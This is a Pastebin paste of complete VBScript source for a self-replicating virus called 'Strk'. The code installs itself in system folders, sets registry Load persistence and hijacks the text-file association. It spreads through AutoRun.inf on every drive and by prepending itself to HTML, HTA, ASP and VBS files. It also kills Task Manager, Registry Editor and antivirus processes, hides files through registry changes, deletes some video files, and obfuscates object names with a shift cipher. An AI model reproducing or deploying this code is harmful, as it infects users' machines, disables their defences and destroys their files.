API tools faq
paste
Advertisement
FlyFar

Strk - VBS Metamorphosis Virus

FlyFar
Mar 6th, 2023
2,251
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VBScript 16.18 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. '$Top_3
  2. On Error Resume Next
  3. Dim Cnt, CntMax, Maxsize, Version, Name_V1, Path_V1,Path_V2
  4. Cnt = 0
  5. CntMax = 300
  6. Maxsize = 150000
  7. Version="3"
  8. Name_V1 = "{HCQ9D-TVCWX-X9QRG-J4B2Y-GR2TT-CM3HY-26VYW-6JRYC-X66GX-JVY2D}.vbs"
  9. Path_V1 = GetSFolder(1) & Name_V1
  10. Path_V2 = GetSFolder(0) & Name_V1
  11. Call Main()
  12. Sub Main()
  13.     On Error Resume Next
  14.     If IsVbs() = True Then
  15.         Call ExeVbs()  
  16.     ElseIf IsHtml() = True Then
  17.         Call ExeWebPage()
  18.     End If
  19. End Sub
  20. Sub ExeWebPage()
  21.     On Error Resume Next
  22.     Dim objfso,vbsCode,SFSO
  23.    
  24.     SFSO="Vfulswlqj1IlohV|vwhpRemhfw"
  25.     Set objfso = CreateObject(DeCode(SFSO))
  26.     vbsCode = GetScriptCode("vbscript")
  27.      
  28.     Call DeSafeSet()    
  29.     Call InvadeSystem(objfso,vbsCode)                          
  30.     Set objfso = Nothing
  31. End Sub
  32.  
  33. Sub ExeVbs()
  34.     On Error Resume Next  
  35.     Dim objfso,objshell,FullPath_Self,Name_Self,vbsCode
  36.     Dim ArgNum,Para_V,oArgs,SubPara_V,RunPath
  37.     Dim FullPath_OK,SFSO
  38.  
  39.     FullPath_OK= GetSFolder(0) & "OK.ini"
  40.     SFSO="Vfulswlqj1IlohV|vwhpRemhfw"
  41.     Set objfso = CreateObject(DeCode(SFSO))
  42.     Set objshell = CreateObject("wscript.shell")  
  43.     Call InitializeVBS(objfso, objshell)
  44.      
  45.     Name_Self =WScript.ScriptName        
  46.     FullPath_Self = WScript.ScriptFullName
  47.          
  48.     If Name_Self = Name_V1 Then      
  49.         Set oArgs = WScript.Arguments
  50.         ArgNum = 0
  51.         Do While ArgNum < oArgs.Count
  52.             Para_V = Para_V & " " & oArgs(ArgNum)
  53.             ArgNum = ArgNum + 1
  54.         Loop
  55.      
  56.         SubPara_V = Lcase(Right(Para_V,3))      
  57.             Select Case SubPara_V
  58.             Case  "run"
  59.                          
  60.                 RunPath = left(FullPath_Self,2)
  61.                 Call Run(RunPath)
  62.                
  63.                 vbsCode = GetSelfCode(objfso, FullPath_Self)
  64.                 Call InvadeSystem(objfso,vbsCode)
  65.                 Call Run(Path_V1)                                  
  66.                  
  67.             Case  "txt"
  68.                 RunPath = "%SystemRoot%\system32\NOTEPAD.EXE " & Para_V  
  69.                 Call Run(RunPath)
  70.                            
  71.                 vbsCode = GetSelfCode(objfso, FullPath_Self)
  72.                 Call InvadeSystem(objfso,vbsCode)
  73.                 Call Run(Path_V1)
  74.                
  75.             Case Else        
  76.                 If PreInstance = True Then
  77.                     WScript.Quit
  78.                 End If
  79.        
  80.                 vbsCode = GetSelfCode(objfso, FullPath_Self)
  81.                 Call InvadeSystem(objfso,vbsCode)                                            
  82.                
  83.                 If  objfso.FileExists(FullPath_OK) = False or IsOK(objfso,Date(), FullPath_OK) =False Then
  84.                      Call DeSafeSet()                                    
  85.                      Call SearchDrives(objfso,vbsCode)
  86.                      Call OK(objfso,Date(), FullPath_OK)                        
  87.                 End If
  88.                  
  89.                 Call Monitor(objfso,vbsCode)            
  90.             End Select                                              
  91.         Else                                                        
  92.             vbsCode = GetSelfCode(objfso, FullPath_Self)      
  93.             Call InvadeSystem(objfso,vbsCode)
  94.             Call Run(Path_V1)
  95.            
  96.     End If
  97.     Set objfso = Nothing
  98.     Set objshell = Nothing
  99. End Sub
  100.  
  101. Sub InitializeVBS(f, Shell)
  102.     On Error Resume Next
  103.     Dim T
  104.     T=Shell.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout")
  105.     If (T>=1) Then
  106.         Shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"
  107.     End if      
  108. End Sub
  109.  
  110. Sub Monitor(objfso,vbsCode)
  111.     On Error Resume Next  
  112.     Dim dc,d
  113.     ProcessNames = Array("ras.exe","360tray.exe","taskmgr.exe","regedit.exe","msconfig.exe","SREng.exe","USBAntiVir.exe")    
  114.     Do  
  115.         Call KillProcess(ProcessNames)    
  116.         Call InvadeSystem(objfso,vbsCode)    
  117.         Set dc = objfso.Drives
  118.         For Each d In dc    
  119.                 Call AutoRun(objfso, d.DriveLetter,vbsCode)        
  120.         Next          
  121.         WScript.sleep 5000
  122.     Loop
  123.    
  124. End Sub
  125.  
  126. Sub AutoRun(objfso, D,vbsCode)
  127.     On Error Resume Next
  128.     Dim path_autorun, path_vbs,inf_autorun
  129.     path_autorun = D & ":\AutoRun.inf"
  130.     path_vbs = D & ":\" & Name_V1  
  131.      
  132.     If objfso.FileExists(path_vbs) = False Or objfso.FileExists(path_autorun) = False or GetVersion(objfso,path_vbs)<Version Then
  133.        
  134.         If objfso.FileExists(path_autorun) = True Then
  135.             objfso.DeleteFile path_autorun, True
  136.         End If
  137.              
  138.         If objfso.FileExists(path_vbs) = True Then
  139.             objfso.DeleteFile path_vbs, True
  140.         End If
  141.        
  142.         Call CopyFile(objfso, vbsCode, path_vbs)
  143.         Call SetFileAttr(objfso, path_vbs)
  144.                  
  145.         inf_autorun = "[AutoRun]" & vbCrLf & "Shellexecute=WScript.exe " & Name_V1 & " ""AutoRun""" & vbCrLf & "shell\AutoRun=Sb_(O)" & vbCrLf &  "shell\AutoRun\command=WScript.exe " & Name_V1 & " ""AutoRun""" & vbCrLf & "shell\AutoRun1=D崘nthV(X)" & vbCrLf &  "shell\AutoRun1\command=WScript.exe " & Name_V1 & " ""AutoRun"""
  146.         Call CopyFile(objfso, inf_autorun, path_autorun)
  147.         Call SetFileAttr(objfso, path_autorun)
  148.                
  149.     End If
  150. End Sub
  151.  
  152. Sub InvadeSystem(objfso,vbsCode)
  153.     On Error Resume Next
  154.     Dim Value,dc,d,HCULoad
  155.      
  156.     HCULoad = "HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Load"
  157.              
  158.     If objfso.FileExists(Path_V1) = True  Then
  159.         If GetVersion(objfso,Path_V1)<Version Then
  160.             objfso.DeleteFile Path_V1 ,True
  161.         End If    
  162.     End If
  163.     If objfso.FileExists(Path_V1) = False  Then  
  164.         Call CopyFile(objfso, vbsCode, Path_V1)
  165.         Call SetFileAttr(objfso, Path_V1)          
  166.     End If
  167.    
  168.     If ReadReg(HCULoad)<> Path_V1 Then
  169.         Call WriteReg (HCULoad, Path_V1, "")
  170.     End If
  171.    
  172.    
  173.     If objfso.FileExists(Path_V2) = True  Then
  174.         If GetVersion(objfso,Path_V2)<Version Then
  175.             objfso.DeleteFile Path_V2 ,True
  176.         End If    
  177.     End If  
  178.     If objfso.FileExists(Path_V2) = False  Then  
  179.         Call CopyFile(objfso, vbsCode, Path_V2)
  180.         Call SetFileAttr(objfso, Path_V2)          
  181.     End If
  182.                
  183.     Value = "%SystemRoot%\System32\WScript.exe " & """" & Path_V2 & """" & " %1 %* "
  184.     If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\")<>Value Then
  185.         Call SetTxtFileAss(Path_V2)
  186.     End If
  187.    
  188.     If ReadReg(HCULoad)<> Path_V1 And ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\")<>Value Then
  189.         Set dc = objfso.Drives
  190.         For Each d In dc
  191.                 Call AutoRun(objfso, d.DriveLetter,vbsCode)
  192.         Next    
  193.     End If  
  194. End Sub
  195.  
  196. Sub SearchDrives(objfso,vbsCode)
  197.     On Error Resume Next
  198.     Dim d ,dc
  199.     Set dc = objfso.Drives
  200.     For Each d In dc
  201.         If Cnt >= CntMax Then '
  202.            Exit For
  203.         End If
  204.         If d.DriveType = 1 Or d.DriveType = 2 Or d.DriveType = 3 Then
  205.                   Call SearchFile(objfso, d.Path & "\",vbsCode)
  206.         End If
  207.     Next
  208. End Sub
  209.  
  210. Sub SearchFile(objfso, strPath,vbsCode)
  211.     On Error Resume Next
  212.     Dim pfo,pf,pfi,ext
  213.     Dim psfo,ps
  214.    
  215.     Set pfo = objfso.GetFolder(strPath)
  216.     Set pf = pfo.Files
  217.     For Each pfi In pf
  218.         If Cnt >= CntMax Then
  219.             Exit For
  220.         End If
  221.         ext = LCase(objfso.GetExtensionName(pfi.Path))
  222.                    
  223.         Select Case ext
  224.             Case "hta","htm","html","asp","vbs":          
  225.                 Call InfectHead(pfi.Path, pfi, objfso, vbsCode, ext)
  226.             Case "mpg", "rmvb", "avi", "rm" :          
  227.             If IsSexFile(pfi.Name) = True Then
  228.                 pfi.Delete
  229.             End If        
  230.         End Select
  231.     Next
  232.     Set psfo = pfo.SubFolders
  233.     For Each ps In psfo
  234.         If Cnt >= CntMax Then
  235.             Exit For
  236.         End If
  237.         Call SearchFile(objfso,ps.Path,vbsCode)
  238.     Next
  239. End Sub
  240.  
  241. Function IsOK(objfso,Now_V,path_f)
  242.     Dim vf
  243.     IsOK = False
  244.     Set vf = objfso.OpenTextFile(path_f,1)  
  245.     If vf.readline ="OK" And InStr(vf.readline ,Now_V) >0 Then
  246.         IsOK = True
  247.     ElseIf InStr(vf.readline, "Admin") >0 Then
  248.         msgbox  "You Are Admin!!! Your Computer Will Not Be Infected!!!"
  249.         IsOK = True
  250.     End If                                
  251. End Function
  252. Sub OK(objfso,Now_V,path_f)
  253.     Dim vf
  254.     Set vf = objfso.OpenTextFile(path_f,2,True)
  255.     vf.write "OK" & vbcrlf
  256.     vf.Writeline Now_V  
  257.     Call SetFileAttr(objfso,path_f)
  258. End Sub
  259.  
  260. Function PreInstance()
  261.     On Error Resume Next
  262.     Dim num_cnt
  263.     Dim strComputer,objWMIService,colProcessList,objProcess
  264.     num_cnt = 0
  265.     PreInstance = False
  266.    
  267.     strComputer = "."
  268.     Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
  269.     Set colProcessList = objWMIService.ExecQuery("Select * from Win32_Process Where " & "Name = 'cscript.exe' or Name = 'wscript.exe'")
  270.     For Each objProcess in colProcessList
  271.         If InStr(CStr(objProcess.CommandLine), WScript.ScriptFullName)>0 Then
  272.             num_cnt = num_cnt + 1
  273.         End If
  274.     Next
  275.    
  276.     If num_cnt>= 2 Then
  277.         PreInstance = True
  278.     End If
  279. End Function
  280.  
  281. Function IsVbs()
  282.     On Error Resume Next
  283.     Dim TErr
  284.     TErr = WScript.ScriptFullName
  285.     If Err Then
  286.         Err.Clear
  287.         IsVbs = False
  288.     Else
  289.         IsVbs = True
  290.     End If
  291. End Function
  292. Function IsHtml()
  293.     On Error Resume Next
  294.     Dim TErr
  295.     TErr = document.Location
  296.     If Err Then
  297.         Err.Clear
  298.         IsHtml = False
  299.     Else
  300.         IsHtml = True
  301.     End If
  302. End Function
  303. Function GetVersion(objfso,path_v)
  304.     Dim fv,buffer
  305.     Set fv = objfso.OpenTextFile(path_v, 1)
  306.     buffer=fv.ReadALL()
  307.     GetVersion=Mid(buffer,InStr(buffer, "'$Top")+6,1)
  308. End Function
  309.  
  310. Sub SetTxtFileAss(sFilePath)
  311.     On Error Resume Next
  312.     Dim Value
  313.     Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* "
  314.     Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\", Value, "REG_EXPAND_SZ")
  315. End Sub
  316. Function GetSelfCode(objfso, FullPath_Self)
  317.    
  318.     Dim n, n1, buffer, Self
  319.     Set Self = objfso.OpenTextFile(FullPath_Self, 1)
  320.     buffer = Self.ReadAll
  321.     n = InStr(buffer, "'$Top")
  322.     n1 = InstrRev(buffer, "'$Bottom")
  323.     buffer = Mid(buffer, n, n1 - n + 8)
  324.     GetSelfCode = buffer
  325.     Self.Close
  326. End Function
  327.  
  328. Function IsSexFile(fname)
  329.     IsSexFile = False
  330.     If InStr(fname, "b篘")>0 Or InStr(fname, "雖")>0 Or InStr(fname, "wP蚥")>0 Or _
  331.                 InStr(fname, "wP")>0 Or InStr(fname, "鉙")>0 Or InStr(fname, ":_xY")>0 Or _
  332.                 InStr(fname, "n弜Y")>0 Or InStr(fname, "&OtGr")>0 Or InStr(fname, "陙xd")>0 Then
  333.         IsSexFile = True
  334.     End If
  335. End Function
  336. Function Isinfected(buffer, ftype)
  337.     Isinfected = True
  338.     Select Case ftype
  339.         Case "hta","htm" , "html" , "asp", "vbs":
  340.             If InStr(buffer, "'$Top") = 0 Then
  341.                 Isinfected = False
  342.             End If
  343.         Case Else
  344.             Isinfected = True
  345.     End Select
  346. End Function
  347. Sub InfectHead(strPath, fi, objfso, vbsCode, ftype)
  348.     On Error Resume Next
  349.     Dim tso, buffer,strCode
  350.     If fi.Size< Maxsize Then
  351.         Set tso = objfso.OpenTextFile(strPath, 1, true)
  352.         buffer = tso.ReadAll()
  353.         tso.Close
  354.        
  355.         Select Case ftype
  356.             Case "hta","htm","html","asp":
  357.                 If Isinfected(buffer, ftype) = False Then
  358.                     strCode = MakeScript(vbsCode, 0)
  359.                     Set tso = objfso.OpenTextFile(strPath, 2, true)
  360.                     Cnt = Cnt + 1
  361.                     tso.Write strCode & vbCrLf & buffer
  362.                     tso.Close
  363.                     Set tso = Nothing
  364.                 End If
  365.             Case "vbs":
  366.                 If Isinfected(buffer, ftype) = False Then
  367.                     n = InStr(buffer , "Option Explicit")
  368.                     If n<>0 Then
  369.                         buffer = Replace(buffer, "Option Explicit", "", 1, 1, 1)
  370.                         Set tso = objfso.OpenTextFile(strPath, 2, true)
  371.                         tso.Write vbsCode & vbCrLf & buffer
  372.                         Cnt = Cnt + 1
  373.                         tso.Close
  374.                         Set tso = Nothing
  375.                     Else
  376.                         Set tso = objfso.OpenTextFile(strPath, 2, true)
  377.                         tso.Write vbsCode & vbCrLf & buffer
  378.                         Cnt = Cnt + 1
  379.                         tso.Close
  380.                         Set tso = Nothing
  381.                     End If
  382.                 End If
  383.             Case Else
  384.         End Select
  385.        
  386.     End If
  387. End Sub
  388.  
  389. Function GetSFolder(p)
  390.     Dim objfso,SFSO
  391.     SFSO="Vfulswlqj1IlohV|vwhpRemhfw"
  392.     Set objfso = CreateObject(DeCode(SFSO))
  393.     GetSFolder = objfso.GetSpecialFolder(p) & "\"
  394.     Set objfso = Nothing
  395. End Function
  396. Function MakeScript(strCode, T)
  397.     If T = 1 Then
  398.         MakeScript = EnCode(strCode)
  399.     Else
  400.         MakeScript = "<" & "SCRIPT Language = VBScript>" & vbCrLf & strCode & vbCrLf & "</" & "SCRIPT>"
  401.     End If
  402. End Function
  403. Sub KillProcess(ProcessNames)
  404.     Dim objWMIService,ProcessName,colProcessList,objProcess
  405.      
  406.     Set objWMIService = GetObject("winmgmts:{impersonationLevel=Impersonate}!root\cimv2")
  407.     For Each ProcessName in ProcessNames
  408.         Set colProcessList = objWMIService.execquery(" Select * From win32_process where name = '" & ProcessName & "' ")
  409.         For Each objProcess in colProcessList
  410.             objProcess.terminate()
  411.         Next
  412.     Next
  413. End Sub
  414. Sub DeleteReg(strkey)
  415.     Dim tmps
  416.     Set tmps = CreateObject("wscript.shell")
  417.     tmps.RegDelete strkey
  418.     Set tmps = Nothing
  419. End Sub
  420. Function ReadReg(strkey)
  421.     Dim tmps
  422.     Set tmps = CreateObject("wscript.shell")
  423.     ReadReg = tmps.RegRead(strkey)
  424.     Set tmps = Nothing
  425. End Function
  426. Sub WriteReg(strkey, Value, vtype)
  427.     Dim tmps
  428.     Set tmps = CreateObject("wscript.shell")
  429.     If vtype = "" Then
  430.         tmps.RegWrite strkey, Value
  431.     Else
  432.         tmps.RegWrite strkey, Value, vtype
  433.     End If
  434.     Set tmps = Nothing
  435. End Sub
  436. Sub Run(ExeFullName)
  437.     Dim WshShell
  438.     Set WshShell = WScript.CreateObject("wscript.shell")
  439.     WshShell.Run ExeFullName
  440.     Set WshShell = Nothing
  441. End Sub
  442.  
  443. Sub DeSafeSet()
  444.     Dim HLMShow , HCUAdvanced,HCUExplorer
  445.     HLMShow= "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue"
  446.     HCUAdvanced="HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden"
  447.     HCUExplorer = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun"  
  448.    
  449.     Call WriteReg (HCUExplorer, 129, "REG_DWORD")  
  450.     Call WriteReg (HCUAdvanced,0,"REG_DWORD")  
  451.     Call WriteReg (HLMShow,0,"REG_DWORD")    
  452. End Sub
  453. Sub SetFileAttr(objfso, pathf)
  454.     Dim vf
  455.     Set vf = objfso.GetFile(pathf)
  456.     vf.Attributes = 6
  457. End Sub
  458. Sub CopyFile(objfso, code, pathf)
  459.     On Error Resume Next
  460.     Dim vf
  461.     Set vf = objfso.OpenTextFile(pathf, 2, true)
  462.     vf.Write code
  463. End Sub
  464. Function GetScriptCode(Languages)
  465.     On Error Resume Next
  466.     Dim soj
  467.     For Each soj In document.Scripts
  468.         If LCase(soj.Language) = Languages Then
  469.             Select Case LCase(soj.Language)
  470.                 Case "vbscript"
  471.                     GetScriptCode = soj.Text
  472.                     Exit Function
  473.                 Case "javascript"
  474.                     GetScriptCode = soj.Text
  475.                     Exit Function
  476.             End Select
  477.         End If
  478.     Next
  479. End Function
  480. Function DeCode(Code)
  481. On Error Resume Next
  482. Dim Curchar,i
  483. For i= 1 To Len(Code)
  484.       Curchar=Mid(Code,i,1)
  485.       If Asc(Curchar) = 16 then
  486.              Curchar=chr(8)
  487.       Elseif Asc(Curchar) = 24 then
  488.              Curchar=chr(12)
  489.       Elseif Asc(Curchar) = 32 then
  490.              Curchar=chr(18)
  491.       Else
  492.              Curchar=chr(Asc(Curchar)-3)
  493.       End if
  494. DeCode=Decode & Curchar
  495. Next
  496. End Function
  497. '$Bottom
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!